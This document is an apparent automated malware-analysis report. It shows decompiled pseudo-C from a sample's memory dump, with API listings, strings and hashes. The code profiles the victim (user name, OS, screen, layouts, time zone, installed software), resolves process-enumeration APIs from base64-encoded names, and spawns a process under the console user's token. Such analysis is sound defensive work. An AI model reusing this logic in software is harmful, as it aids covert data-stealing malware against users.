                                                                                                                                                                                          				E00406C4C( &_v8, __eax, __esi);
                                                                                                                                                                                          				_push(_v8);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				_push("EXE_PATH  :   ");
                                                                                                                                                                                          				E00416F88(0,  &_v12);
                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				_push("Windows    :   ");
                                                                                                                                                                                          				E00407A4C( &_v28, _t140, __edi, __esi);
                                                                                                                                                                                          				_push(_v28);
                                                                                                                                                                                          				_push(0x4175f4);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				E00403D2C( &_v20, _v24);
                                                                                                                                                                                          				_push(_v20);
                                                                                                                                                                                          				E004066C0( &_v32, _t184);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				_push(0x4175fc);
                                                                                                                                                                                          				E00406BB4( &_v36);
                                                                                                                                                                                          				_push(_v36);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t140, _v16);
                                                                                                                                                                                          				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
                                                                                                                                                                                          				E00403D2C( &_v44, _v48);
                                                                                                                                                                                          				_push(_v44);
                                                                                                                                                                                          				E00406610( &_v52);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(0x417630);
                                                                                                                                                                                          				E004065CC( &_v56);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(0x417638);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t140, _v40);
                                                                                                                                                                                          				E004037DC( &_v68, "Screen: ",  *_t140);
                                                                                                                                                                                          				E00403D2C( &_v64, _v68);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				E00406FDC(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
                                                                                                                                                                                          				_push(_v72);
                                                                                                                                                                                          				_push(0x417654);
                                                                                                                                                                                          				E00406FDC(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
                                                                                                                                                                                          				_push(_v76);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t140, _v60);
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				_push("Layouts: ");
                                                                                                                                                                                          				E00416FB8( &_v80, _t140, __edi, _t180);
                                                                                                                                                                                          				_push(_v80);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				_push("LocalTime: ");
                                                                                                                                                                                          				E00417198( &_v84, _t140, _t180);
                                                                                                                                                                                          				_push(_v84);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				_push("Zone: ");
                                                                                                                                                                                          				E00417098( &_v88, _t140, _t179, _t180, _t184);
                                                                                                                                                                                          				_push(_v88);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				E00416748( &_v92, _t140, _t179, _t180);
                                                                                                                                                                                          				_push(_v92);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				Sleep(1);
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				E00416B94( &_v96, _t140, _t179, _t180, _t184);
                                                                                                                                                                                          				_push(_v96);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				Sleep(1);
                                                                                                                                                                                          				_push( *_t140);
                                                                                                                                                                                          				_push("[Soft]");
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				Sleep(1);
                                                                                                                                                                                          				E00415F30( &_v100, _t140, _t179, _t180);
                                                                                                                                                                                          				E00403798(_t140, _v100);
                                                                                                                                                                                          				_t171 = 0x4175a8;
                                                                                                                                                                                          				 *[fs:eax] = _t171;
                                                                                                                                                                                          				_push(E00417583);
                                                                                                                                                                                          				E00403508( &_v100, 6);
                                                                                                                                                                                          				E00403B98( &_v76, 2);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B98( &_v64, 4);
                                                                                                                                                                                          				E004034E4( &_v48);
                                                                                                                                                                                          				E00403B98( &_v44, 4);
                                                                                                                                                                                          				E00403508( &_v28, 2);
                                                                                                                                                                                          				E00403B98( &_v20, 2);
                                                                                                                                                                                          				return E00403508( &_v12, 2);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                            • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                          • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                          • API String ID: 75899496-943277980
                                                                                                                                                                                          • Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                          • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                          • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E00407DD0(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                          				char _v112;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                                                                                          				_Unknown_base(*)()* _t30;
                                                                                                                                                                                          				intOrPtr* _t61;
                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                          				intOrPtr* _t76;
                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                          
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_v112 = 0;
                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                          				 *[fs:eax] = _t81 + 0xffffff98;
                                                                                                                                                                                          				_t28 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
                                                                                                                                                                                          				_t30 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
                                                                                                                                                                                          				_t76 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
                                                                                                                                                                                          				E00402754(0,  &_v112);
                                                                                                                                                                                          				E00403D2C( &_v20, _v112);
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				_v108 = 0x44;
                                                                                                                                                                                          				_v100 = 0;
                                                                                                                                                                                          				 *_t28( *[fs:eax], 0x407eea, _t81, __edi, __esi, __ebx, _t79, __ebx);
                                                                                                                                                                                          				_push( &_v16);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				if( *_t30() != 0) {
                                                                                                                                                                                          					 *_t76( &_v20, _v12, 0xffffffff);
                                                                                                                                                                                          					_t61 =  *0x41b5e8; // 0x41c728
                                                                                                                                                                                          					 *((intOrPtr*)( *_t61))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t74);
                                                                                                                                                                                          				 *[fs:eax] = _t74;
                                                                                                                                                                                          				_push(E00407EF1);
                                                                                                                                                                                          				E004034E4( &_v108);
                                                                                                                                                                                          				E00403B80( &_v16);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                            • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                          • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                          • API String ID: 2206896924-1825016774
                                                                                                                                                                                          • Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                          • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E00407DD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                          				_Unknown_base(*)()* _t25;
                                                                                                                                                                                          				_Unknown_base(*)()* _t27;
                                                                                                                                                                                          				intOrPtr* _t58;
                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v108 = 0;
                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                          				 *[fs:eax] = _t78 + 0xffffff98;
                                                                                                                                                                                          				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
                                                                                                                                                                                          				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
                                                                                                                                                                                          				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
                                                                                                                                                                                          				E00402754(0,  &_v108);
                                                                                                                                                                                          				E00403D2C( &_v16, _v108);
                                                                                                                                                                                          				E00404F00();
                                                                                                                                                                                          				_v104 = 0x44;
                                                                                                                                                                                          				_v96 = 0;
                                                                                                                                                                                          				 *_t25( *[fs:eax], 0x407eea, _t78, __edi, __esi, __ebx, _t76);
                                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				if( *_t27() != 0) {
                                                                                                                                                                                          					 *_t73( &_v20, _v12, 0xffffffff);
                                                                                                                                                                                          					_t58 =  *0x41b5e8; // 0x41c728
                                                                                                                                                                                          					 *((intOrPtr*)( *_t58))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t71);
                                                                                                                                                                                          				 *[fs:eax] = _t71;
                                                                                                                                                                                          				_push(E00407EF1);
                                                                                                                                                                                          				E004034E4( &_v108);
                                                                                                                                                                                          				E00403B80( &_v16);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}



















                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                            • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                          • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                          • API String ID: 2206896924-1825016774
                                                                                                                                                                                          • Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                          • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00416B94(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                          				char _v17;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                          				char _v588;
                                                                                                                                                                                          				char _v592;
                                                                                                                                                                                          				char _v596;
                                                                                                                                                                                          				char _v600;
                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                          				char _v608;
                                                                                                                                                                                          				char _v612;
                                                                                                                                                                                          				CHAR* _t113;
                                                                                                                                                                                          				CHAR* _t119;
                                                                                                                                                                                          				CHAR* _t125;
                                                                                                                                                                                          				void* _t137;
                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                          				void* _t169;
                                                                                                                                                                                          				signed int _t170;
                                                                                                                                                                                          				void* _t171;
                                                                                                                                                                                          				intOrPtr* _t174;
                                                                                                                                                                                          				signed int _t183;
                                                                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                                                                          				void* _t193;
                                                                                                                                                                                          				signed int _t194;
                                                                                                                                                                                          				signed int _t195;
                                                                                                                                                                                          				intOrPtr _t214;
                                                                                                                                                                                          				intOrPtr _t216;
                                                                                                                                                                                          				signed int _t229;
                                                                                                                                                                                          				intOrPtr* _t239;
                                                                                                                                                                                          				signed int _t240;
                                                                                                                                                                                          				signed int _t242;
                                                                                                                                                                                          				void* _t243;
                                                                                                                                                                                          				void* _t244;
                                                                                                                                                                                          				void* _t246;
                                                                                                                                                                                          				intOrPtr _t247;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t238 = __esi;
                                                                                                                                                                                          				_t245 = _t246;
                                                                                                                                                                                          				_t247 = _t246 + 0xfffffda0;
                                                                                                                                                                                          				_v612 = 0;
                                                                                                                                                                                          				_v608 = 0;
                                                                                                                                                                                          				_v604 = 0;
                                                                                                                                                                                          				_v596 = 0;
                                                                                                                                                                                          				_v600 = 0;
                                                                                                                                                                                          				_v592 = 0;
                                                                                                                                                                                          				_v588 = 0;
                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                          				_v16 = __eax;
                                                                                                                                                                                          				 *[fs:eax] = _t247;
                                                                                                                                                                                          				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                                                                                                                                                                                          				_t113 = E00403990(_v588);
                                                                                                                                                                                          				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
                                                                                                                                                                                          				E00406984("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
                                                                                                                                                                                          				_t119 = E00403990(_v592);
                                                                                                                                                                                          				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
                                                                                                                                                                                          				E00406984("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
                                                                                                                                                                                          				_t125 = E00403990(_v596);
                                                                                                                                                                                          				E00406984("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
                                                                                                                                                                                          				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
                                                                                                                                                                                          				E004034E4(_v16);
                                                                                                                                                                                          				_t193 =  *_t192(2, 0,  *[fs:eax], 0x416eca, _t246, __edi, __esi, __ebx, _t244);
                                                                                                                                                                                          				if(_t193 != 0xffffffff) {
                                                                                                                                                                                          					_v584 = 0x22c;
                                                                                                                                                                                          					_push( &_v584);
                                                                                                                                                                                          					_push(_t193);
                                                                                                                                                                                          					if( *_t235() != 0) {
                                                                                                                                                                                          						do {
                                                                                                                                                                                          							_push(E004045EC(_v8) + 1);
                                                                                                                                                                                          							E004047A8();
                                                                                                                                                                                          							_t183 = E004045EC(_v8);
                                                                                                                                                                                          							_t243 =  &_v584;
                                                                                                                                                                                          							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
                                                                                                                                                                                          							_t247 = _t247 + 0x10;
                                                                                                                                                                                          							_t235 = _t243 + 0x116;
                                                                                                                                                                                          							_t239 = _t239;
                                                                                                                                                                                          							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
                                                                                                                                                                                          							_push( &_v584);
                                                                                                                                                                                          							_push(_t193);
                                                                                                                                                                                          						} while ( *_t239() != 0);
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t174 =  *0x41b57c; // 0x41c690
                                                                                                                                                                                          					 *((intOrPtr*)( *_t174))(_t193);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t137 = E004045EC(_v8) - 1;
                                                                                                                                                                                          				if(_t137 >= 0) {
                                                                                                                                                                                          					_v28 = _t137 + 1;
                                                                                                                                                                                          					_t195 = 0;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_v17 = 1;
                                                                                                                                                                                          						_t169 = E004045EC(_v8) - 1;
                                                                                                                                                                                          						if(_t169 >= 0) {
                                                                                                                                                                                          							_t171 = _t169 + 1;
                                                                                                                                                                                          							_t229 = 0;
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								_t43 = _t195 * 0x8b * 4; // 0x0
                                                                                                                                                                                          								_t242 = _t229 * 0x8b;
                                                                                                                                                                                          								_t235 = _v8;
                                                                                                                                                                                          								_t47 = _t242 * 4; // 0x1ffff
                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                                                                                                                                                                                          									_v17 = 0;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t229 = _t229 + 1;
                                                                                                                                                                                          								_t171 = _t171 - 1;
                                                                                                                                                                                          							} while (_t171 != 0);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t170 = _t195 * 0x8b;
                                                                                                                                                                                          						_t52 = _t170 * 4; // 0x0
                                                                                                                                                                                          						_t56 = _t170 * 4; // 0x1ffff
                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                                                                                                                                                                                          							_v17 = 1;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if(_v17 == 1) {
                                                                                                                                                                                          							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t195 = _t195 + 1;
                                                                                                                                                                                          						_t64 =  &_v28;
                                                                                                                                                                                          						 *_t64 = _v28 - 1;
                                                                                                                                                                                          					} while ( *_t64 != 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_v12 = GetCurrentProcessId();
                                                                                                                                                                                          				_t141 = E004045EC(_v8) - 1;
                                                                                                                                                                                          				if(_t141 >= 0) {
                                                                                                                                                                                          					_v28 = _t141 + 1;
                                                                                                                                                                                          					_t194 = 0;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_t240 = _t194 * 0x8b;
                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
                                                                                                                                                                                          							_t75 = _t240 * 4; // 0x1ffff
                                                                                                                                                                                          							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                                                                                                                                                                                          								_push(_v24);
                                                                                                                                                                                          								_t90 = _t240 * 4; // 0x0
                                                                                                                                                                                          								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                                                                                                                                                                                          								_push(_v608);
                                                                                                                                                                                          								_push(E00416F84);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								_push(_v24);
                                                                                                                                                                                          								_t82 = _t240 * 4; // 0x0
                                                                                                                                                                                          								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                                                                                                                                                                                          								_push(_v604);
                                                                                                                                                                                          								_push(0x416f78);
                                                                                                                                                                                          								_push(E00416F84);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t96 = _t194 * 0x8b * 4; // 0x1ffff
                                                                                                                                                                                          							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
                                                                                                                                                                                          							E00403798( &_v24, _v612);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E00403538(_v16, _v24);
                                                                                                                                                                                          						_t194 = _t194 + 1;
                                                                                                                                                                                          						_t103 =  &_v28;
                                                                                                                                                                                          						 *_t103 = _v28 - 1;
                                                                                                                                                                                          					} while ( *_t103 != 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t214);
                                                                                                                                                                                          				 *[fs:eax] = _t214;
                                                                                                                                                                                          				_push(E00416ED1);
                                                                                                                                                                                          				E00403508( &_v612, 7);
                                                                                                                                                                                          				E004034E4( &_v24);
                                                                                                                                                                                          				_t216 =  *0x4169c8; // 0x4169cc
                                                                                                                                                                                          				return E004047B4( &_v8, _t216);
                                                                                                                                                                                          			}









































                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d97
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416da4
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416daf
                                                                                                                                                                                          0x00416dba
                                                                                                                                                                                          0x00416dbd
                                                                                                                                                                                          0x00416dc4
                                                                                                                                                                                          0x00416dc7
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dd7
                                                                                                                                                                                          0x00416de0
                                                                                                                                                                                          0x00416de7
                                                                                                                                                                                          0x00416e22
                                                                                                                                                                                          0x00416e2e
                                                                                                                                                                                          0x00416e37
                                                                                                                                                                                          0x00416e3c
                                                                                                                                                                                          0x00416e42
                                                                                                                                                                                          0x00416e4f
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416df5
                                                                                                                                                                                          0x00416dfe
                                                                                                                                                                                          0x00416e03
                                                                                                                                                                                          0x00416e09
                                                                                                                                                                                          0x00416e0e
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e1b
